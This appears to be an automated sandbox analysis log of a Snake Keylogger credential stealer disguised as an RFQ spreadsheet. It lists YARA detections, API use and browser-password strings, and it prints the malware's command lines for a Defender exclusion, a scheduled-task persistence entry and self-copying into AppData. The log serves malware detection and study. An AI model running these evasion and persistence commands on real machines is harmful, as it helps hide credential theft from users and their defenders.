                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0000000D.00000002.3650503723.0000000000427000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe PID: 7828, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: gNFUFfdz.exe PID: 7624, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: gNFUFfdz.exe PID: 2964, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: gNFUFfdz.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, Ot9VvNV66DIV9guJ5R.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, Ot9VvNV66DIV9guJ5R.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, Ot9VvNV66DIV9guJ5R.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, B3haO0cput5fqoIn0h.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, B3haO0cput5fqoIn0h.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/19@3/4
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile created: C:\Users\user\AppData\Roaming\gNFUFfdz.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:804:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMutant created: \Sessions\1\BaseNamedObjects\CTpmJHQD
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC2F0.tmpJump to behavior
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: gNFUFfdz.exe.0.drBinary or memory string: INSERT INTO salcy_and_govtx (sal_cyc_dt_range, govt_tx_rate) VALUES (@sal_cyc_dt_range, @govt_tx_rate);Successfully Inserted/Updated
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003440000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003430000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.000000000344E000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.000000000312C000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.000000000310E000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.000000000311E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeVirustotal: Detection: 43%
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeReversingLabs: Detection: 42%
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile read: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe"
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gNFUFfdz.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpC2F0.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\gNFUFfdz.exe C:\Users\user\AppData\Roaming\gNFUFfdz.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpAC7.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess created: C:\Users\user\AppData\Roaming\gNFUFfdz.exe "C:\Users\user\AppData\Roaming\gNFUFfdz.exe"
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe"Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gNFUFfdz.exe"Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpC2F0.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpAC7.tmp"
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeProcess created: C:\Users\user\AppData\Roaming\gNFUFfdz.exe "C:\Users\user\AppData\Roaming\gNFUFfdz.exe"
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeSection loaded: wintypes.dllJump to behavior
